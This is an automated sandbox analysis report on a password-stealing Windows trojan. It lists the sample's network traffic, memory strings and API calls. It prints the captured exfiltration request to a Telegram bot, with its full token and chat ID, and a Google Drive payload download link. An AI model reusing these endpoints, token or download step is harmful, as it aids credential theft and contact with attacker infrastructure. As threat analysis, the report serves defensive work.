              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: drive.google.com
              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
              Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
              Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
              Source: unknownHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31dea4934fa5Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: grrezORe7h.exe, 00000004.00000002.3012744348.000000003476C000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.000000003495C000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.000000003472D000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.00000000347B6000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.00000000348D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
              Source: grrezORe7h.exe, 00000004.00000002.3012744348.000000003495C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndn
              Source: grrezORe7h.exe, 00000004.00000002.3012744348.000000003476C000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.000000003495C000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.00000000347B6000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.00000000348D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
              Source: grrezORe7h.exe, 00000004.00000002.3012744348.000000003476C000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.000000003495C000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.000000003472D000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.0000000034561000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.00000000347B6000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.00000000348D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
              Source: grrezORe7h.exe, 00000004.00000002.3014530258.0000000036E28000.00000004.00000020.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000003.2880307100.0000000036E5E000.00000004.00000020.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.0000000034561000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3014530258.0000000036E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
              Source: grrezORe7h.exe, 00000004.00000002.3014530258.0000000036E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/.d
              Source: grrezORe7h.exe, 00000004.00000003.2880307100.0000000036E5E000.00000004.00000020.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3014530258.0000000036E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/S
              Source: grrezORe7h.exe, 00000004.00000002.3012744348.000000003476C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgH
              Source: grrezORe7h.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: grrezORe7h.exe, 00000004.00000002.3012744348.0000000034561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: grrezORe7h.exe, 00000004.00000002.3012744348.00000000348D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram
              Source: grrezORe7h.exe, 00000004.00000002.3012744348.000000003476C000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.000000003495C000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.0000000034627000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.00000000346FD000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.000000003472D000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.000000003463C000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.00000000347B6000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.00000000348D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
              Source: grrezORe7h.exe, 00000004.00000002.3012744348.00000000345BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: grrezORe7h.exe, 00000004.00000002.3012744348.00000000348D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382
              Source: grrezORe7h.exe, 00000004.00000002.3012744348.00000000345BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.orgFrH
              Source: grrezORe7h.exe, 00000004.00000003.2238578202.0000000003FCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
              Source: grrezORe7h.exe, 00000004.00000002.2991916769.0000000003F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
              Source: grrezORe7h.exe, 00000004.00000002.2991916769.0000000003F92000.00000004.00000020.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.2992228193.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1t40TkIMwnRUYXXqQGD85PlamUR-D2DEo
              Source: grrezORe7h.exe, 00000004.00000003.2270597506.0000000003FCD000.00000004.00000020.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.2991916769.0000000003FAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
              Source: grrezORe7h.exe, 00000004.00000003.2270597506.0000000003FCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/P
              Source: grrezORe7h.exe, 00000004.00000003.2270597506.0000000003FCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/Y40h
              Source: grrezORe7h.exe, 00000004.00000003.2238578202.0000000003FCD000.00000004.00000020.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000003.2270597506.0000000003FCD000.00000004.00000020.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.2991916769.0000000003FAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1t40TkIMwnRUYXXqQGD85PlamUR-D2DEo&export=download
              Source: grrezORe7h.exe, 00000004.00000003.2270597506.0000000003FCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1t40TkIMwnRUYXXqQGD85PlamUR-D2DEo&export=downloadle
              Source: grrezORe7h.exe, 00000004.00000002.3012744348.0000000034591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
              Source: grrezORe7h.exe, 00000004.00000002.3012744348.0000000034591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
              Source: grrezORe7h.exe, 00000004.00000002.3012744348.0000000034591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
              Source: grrezORe7h.exe, 00000004.00000002.3012744348.0000000034591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189.SH
              Source: grrezORe7h.exe, 00000004.00000003.2238578202.0000000003FCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
              Source: grrezORe7h.exe, 00000004.00000003.2238578202.0000000003FCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
              Source: grrezORe7h.exe, 00000004.00000003.2238578202.0000000003FCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
              Source: grrezORe7h.exe, 00000004.00000003.2238578202.0000000003FCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
              Source: grrezORe7h.exe, 00000004.00000003.2238578202.0000000003FCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
              Source: grrezORe7h.exe, 00000004.00000003.2238578202.0000000003FCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: grrezORe7h.exe, 00000004.00000003.2238578202.0000000003FCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
              Source: grrezORe7h.exe, 00000004.00000003.2238578202.0000000003FCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
              Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
              Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
              Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
              Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
              Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
              Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
              Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
              Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
              Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
              Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
              Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
              Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
              Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
              Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
              Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
              Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
              Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49810 version: TLS 1.2
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 0_2_004052F3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052F3
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032A0
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_004032A0
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 0_2_00404B300_2_00404B30
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 0_2_004070410_2_00407041
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 0_2_0040686A0_2_0040686A
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_004070414_2_00407041
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_0040686A4_2_0040686A
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_00404B304_2_00404B30
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_001543284_2_00154328
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_00158DA04_2_00158DA0
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_00155F904_2_00155F90
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_00152DD14_2_00152DD1
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_36EC57614_2_36EC5761
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_36ECCCA04_2_36ECCCA0
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_36EC331B4_2_36EC331B
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_36EC784D4_2_36EC784D
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_36ECDEFA4_2_36ECDEFA
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_36EC6EA04_2_36EC6EA0
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_36ECC64D4_2_36ECC64D
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_36ECE79F4_2_36ECE79F
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_36EC7F184_2_36EC7F18
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_36ECB4EC4_2_36ECB4EC
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_36ECCC8A4_2_36ECCC8A
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_36ECBD884_2_36ECBD88
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_36ECDAA24_2_36ECDAA2
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_36ECEBF74_2_36ECEBF7
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_36EC03CA4_2_36EC03CA
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_36ECE3524_2_36ECE352
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_36EC332D4_2_36EC332D
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_36ECB09A4_2_36ECB09A
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_36ECB07F4_2_36ECB07F
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_36EC78484_2_36EC7848
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_36ECF05A4_2_36ECF05A
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_36ECC1F24_2_36ECC1F2
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_36ECB9444_2_36ECB944
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_373A86504_2_373A8650
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_373A96C84_2_373A96C8
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_373A9D104_2_373A9D10
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_373ABDF04_2_373ABDF0
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_373AA3604_2_373AA360
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_373ABA974_2_373ABA97
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_373AA9B04_2_373AA9B0
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_373A5F104_2_373A5F10
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_373A5F014_2_373A5F01
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_373A3F704_2_373A3F70
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_373A3F604_2_373A3F60
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_373A67B04_2_373A67B0
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_373A0FA84_2_373A0FA8
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_373AAFF84_2_373AAFF8
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_373AAFF74_2_373AAFF7
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_373A67C04_2_373A67C0
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_373A2E104_2_373A2E10
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_373A56604_2_373A5660
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_373A56504_2_373A5650
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_373A86554_2_373A8655
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_373A36C04_2_373A36C0
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_373A25604_2_373A2560
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_373A4DB04_2_373A4DB0
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_373A6C184_2_373A6C18
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_373A6C094_2_373A6C09
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_373A14004_2_373A1400
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_373A1CB04_2_373A1CB0
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_373A74C84_2_373A74C8
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_373A3B184_2_373A3B18
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_373A63684_2_373A6368
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_373A7B654_2_373A7B65
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_373A43C84_2_373A43C8
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_373A52084_2_373A5208
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_373A52074_2_373A5207
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_373A32684_2_373A3268
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_373A5AB84_2_373A5AB8
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_373AF1304_2_373AF130
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_373A21084_2_373A2108
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_373A29B84_2_373A29B8
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_373A48204_2_373A4820
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_373A70704_2_373A7070
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_373A18584_2_373A1858
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_373A00404_2_373A0040
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_377DE7C84_2_377DE7C8
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_377DD6C14_2_377DD6C1
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_377D83284_2_377D8328
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: String function: 00402BBF appears 51 times
              Source: grrezORe7h.exe, 00000004.00000002.2991916769.0000000003F92000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs grrezORe7h.exe
              Source: grrezORe7h.exe, 00000004.00000002.3012516628.00000000343E7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs grrezORe7h.exe
              Source: grrezORe7h.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/8@5/5
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032A0
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_004032A0
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 0_2_004045B4 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004045B4
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 0_2_00402095 CoCreateInstance,0_2_00402095
              Source: C:\Users\user\Desktop\grrezORe7h.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetensJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeMutant created: NULL
